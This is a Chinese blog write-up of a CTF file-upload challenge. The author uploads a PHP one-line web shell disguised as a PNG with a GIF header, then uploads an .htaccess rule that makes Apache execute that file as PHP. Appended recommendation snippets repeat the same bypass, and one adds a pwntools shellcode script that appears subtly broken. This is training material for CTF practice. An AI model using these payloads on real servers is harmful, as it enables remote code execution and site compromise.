BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞

最新推荐文章于 2025-03-31 17:36:02 发布
最新推荐文章于 2025-03-31 17:36:02 发布
阅读量9.7k 收藏 34
点赞数 19
分类专栏: CTF-WEB CTF-WEB-文件漏洞 文章标签: php 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/118049911
版权

BUUCTF之[MRCTF2020]你传你🐎呢

虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。
首先,启动挑战的项目
在这里插入图片描述
emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上传漏洞,结果没做出来。
不管怎么样,先上传一句话木马。并且将下面的内容保存成文件1.png

GIF89a? 
<script language="php">eval($_POST['zyh']);</script>

然后该上传改文件,并且用BurpSuite来抓包
在这里插入图片描述
结果发现php php2 phtml 这些文件的后缀名都不能绕过检测。所以就直接上传1.png,抱着试试看的心态。
在这里插入图片描述
在这里插入图片描述
当我点击这个测试连接的时候,结果返回错误信息。。。。
在这里插入图片描述
挣扎了好一段时间后跑去看别人的WP才知道这题是一个文件上传里的文件解析漏洞。总结下来的经验就是更改Apache里的.htaccess的配置。可以将其它类型的文件转化为PHP的文件类型。

来源网站:https://www.cnblogs.com/adforce/archive/2012/11/23/2784664.html
.htaccess是什么

启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配置:AccessFileName .config 。

笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

那么现在开始写一个.htaccess文件,里面的内容为:

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

注意里面的1.png要和你刚才上传的文件名一模一样!
现在返回到刚才的挑战页面,上传这个配置文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
最后flag在根目录下的flag文件下
在这里插入图片描述
在这里插入图片描述

[MRCTF2020]你你呢
汗的博客
09-06 879
准备一张图片马,命名shell.png .htaccess文件 <FilesMatch "s"> SetHandler application/x-httpd-php </FilesMatch> 需要用burp修改Content-Type: image/jpeg
BUUCTF-Web-[MRCTF2020]你你马呢
m0_61851859的博客
04-03 952
3.考虑是不是对php进行过滤,尝试黑名单绕过,将文件后缀修改为.phtml等一些后缀名发现上失败。4.将文件类型修改为.jpg类型尝试上并启用burpsuite抓包发现是可以成功上的。一个.htaccess文件去把.jpg解析成.php。把content-type改成image/jpeg。1.打开题目发现文件位置,猜测为文件漏洞。7.拼接url使用蚁剑连接,成功找到flag。2.尝试上一句话木马,上失败。
BUUCTF闯关日记--[MRCTF2020]你你呢(超详解)
qq_64201116的博客
05-19 4437
进入页面 文件漏洞,因为有些人没看过我前面的文章我再把我的总结发一下 1、前端绕过,抓包修改后缀名, 2、文件内容绕过,用图片马,抓包修改后缀绕过 3、黑名单绕过,那么我们可以改成phtml抓包绕过 4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)” 5、大小写绕过,抓包后修改后缀为.PHp 7、空格绕过,抓包修改后缀,在后缀后面加上空格 8、点绕
CTF类题目复现总结-[MRCTF2020]Hello_ misc 1
最新发布
weixin_42487326的博客
03-31 1444
CTF类题目复现总结-[MRCTF2020]Hello_ misc 1
BUUCTF之[MRCTF2020]你你呢1
weixin_66294723的博客
10-12 1784
很明显是文件漏洞,通过🐎可知应该是要一个马进去,一开始把自己制作的图片马进去后自己的图片马不行,content-type也没问题后上网找wp发现如果一系列%00,改大小写,图片马之类都不行的话 ,或者上之后 但是菜刀连接不了,回显显示没有数据的话,就代表要改配置文件
buuctf-[MRCTF2020]你你呢(小宇特详解)
小宇的web博客
01-26 1852
buuctf-[MRCTF2020]你你????呢(小宇特详解) 这里先试着修改后缀进行黑名单绕过,然而不行 这里的正确方法是进行.htaccess绕过 这里先上一个.htaccess文件 <FilesMatch "1.png"> SetHandler application/x-httpd-php </FilesMatch> 注意:这里上.htaccess文件的时候一定要抓包将content-type的值修改为image/png 然后上一个1.png <?php
BUUCTF之[MRCTF2020]你你呢 1
qq_44122254的博客
02-10 2199
打开题目靶场,发现是一个上页面 随便上一个文件进行试验一下 发现对此文件有进行过滤 上一个图片进行尝试,发现可以上png图片,制作图片码进行上 图片码内容如下 发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空 ...
BUUCTF---[MRCTF2020]你你呢1
2201_75556700的博客
03-08 995
5.需要上一个.htaccess的文件来把jpg后缀的文件全都当作php文件来执行,.htsccess文件内容为。3.上shell.jpg文件,显示连接成功,但是用蚁剑连接却连接不上。shell文件内容为。就接下来上.htaccess文件,修改这里。7.接下来我们放包回去,点击forward。8.接下来我们访问shell.jpg文件。6.刚刚我们上了shell.jpg。9.接下来我们使用蚁剑连接。4.用bp抓包,修改属性。
【buusql】[MRCTF2020]你你呢 1
katniss688的博客
06-28 752
而后门的具体位置虽然就在/var/www/html/upload/d3cf55c760ac2bb268b0c6e6072c610a/ccrequest.png这个文件里,但我们还需要定位到我们的网页index.php储存在html这个文件夹里,所以说,后门的url就是网页url/upload/xxxxxxxxxxxxxx/xx.png。copy:将文件复制或者是合并,/b的意思是以前边图片二进制格式为主,进行合并,合并后的文件依旧是二进制文件,实用于图像/声音等二进制文件。首先,准备一个一句话木马。
buuctfMRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 1374
真的很详细
BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 6049
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
BUUCTF [MRCTF2020]你你呢
墨子辰的博客
02-04 731
考点:.htaccess文件 先上一个正常图片,发现成功上而且能够访问。 直接一个1.sdga丢上去,看看返回包。 发现可以成功上。 可能有人到这里就懵了,为什么要上1.sdga,它是个神马文件类型???? 对,这里我上了一个不存在的文件类型,这样可以方便我们一下判断出是白名单还是黑名单限制。 这里既然能够上一个不存在的文件名,那么说明这里是黑名单限制,so接下来就是黑名单上的招式咯。 看好了 别眨眼·~~~ No.1:上 .htaccess No.2:上 .user.ini
BUUCTF WEB [MRCTF2020]你你*呢
Y1da的博客
04-18 460
BUUCTF WEB [MRCTF2020]你你🐎呢 解法有些类似[SUCTF 2019]CheckIn 尝试上各种php文件后缀均被过滤,尝试上.htaccess文件将png文件当做php文件执行 AddType application/x-httpd-php .png 上后抓包,将Content-Type修改为image/png POST /upload.php HTTP/1.1 Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buu
BUUCTF - [MRCTF2020]你你呢
qq_40860153的博客
10-12 495
1.打开题目,一个简单的文件,需要利用 .htaccess 文件把.jpg文件解析成.php执行 2.上.php,发现不行,试试上.jpg,可以
[MRCTF2020]你你呢 1
qq_43618536的博客
07-03 1336
BUUCTF的[MRCTF2020]你你🐎呢 1
BUUCTF——[MRCTF2020]你你呢 1
weixin_45864041的博客
09-28 1383
php文件格式的一句话木马。 上失败。那就先jpg文件 发现上成功。然后我们可以先把路径保存下来。 接下来我们再试一下可不可以通过抓包修改的方式上php文件。 发现上失败。然后,我们又得变换思路了。上一篇文章,我们知道目录下有一个index.php文件,然后我们通过上.user.ini文件让图片被当做php文件解析。接下来我想到一个思路,那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上的jpg/.
mrctf2020_shellcode
02-10
### 关于 mrctf2020 Shellcode 题目解析 mrctf2020中的`shellcode_revenge`是一道较为复杂的逆向工程与漏洞利用相结合的题目[^1]。该题目的核心在于理解给定二进制文件的工作机制以及如何构造有效的Shellcode来绕过各种防护措施。 #### 一、环境准备 为了完成此挑战,参赛者通常需要设置一个类似的实验环境,在本地重现目标程序的行为以便更好地分析其逻辑并测试所编写Shellcode的效果。这可能涉及到安装特定版本的操作系统及其补丁级别,并禁用不必要的安全特性如ASLR(Address Space Layout Randomization),DEP(Data Execution Prevention)等。 #### 二、静态分析 通过反汇编工具(例如IDA Pro, Ghidra 或 Radare2)可以获取到可执行文件内部结构的信息,包括但不限于函数调用图谱、字符串表项以及其他有助于推断程序意图的数据片段。对于本题而言,重点是要找到能够被攻击者控制输入影响的部分——即存在缓冲区溢出或其他形式内存破坏缺陷的地方。 #### 三、动态调试 借助GDB这样的调试器可以在运行时监控应用程序状态变化情况,观察数据流走向从而验证假设是否成立;同时也可以用来辅助定位某些难以仅靠静态方法得出结论的关键位置。比如确认哪些寄存器/变量保存着重要指针值或是返回地址之类的东西。 #### 四、构建Payload 基于前面两步获得的知识点,现在应该清楚知道怎样去触发漏洞并将控制权转移到自定义代码上去了。此时就需要精心设计一段紧凑高效的机器指令序列作为最终载荷(Payload),它不仅要实现预期功能(通常是打开shell或者其他远程命令接口),而且还要考虑到实际环境中可能存在的一些限制条件,像坏字符过滤等问题都需要妥善处理好。 ```python # Python脚本用于生成payload from pwn import * context.arch = 'amd64' # 设置架构类型为x86_64 shellcode = asm(shellcraft.sh()) # 使用pwntools库自动组装简单的execve("/bin/sh") shellcode bad_chars = b'\x00\x0a\x0d' # 定义不允许出现的字节列表 filtered_shellcode = ''.join([chr(ord(c)) for c in shellcode if ord(c) not in bad_chars]) # 过滤掉非法字符 print(filtered_shellcode.encode('latin-1')) # 输出经过筛选后的shellcode供后续使用 ``` #### 五、提交Flag 当一切准备工作都完成后就可以尝试发送构造好的exploit至服务器端口等待响应了。如果成功的话将会得到交互式的shell访问权限进而读取flag文本内容完成解题过程。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值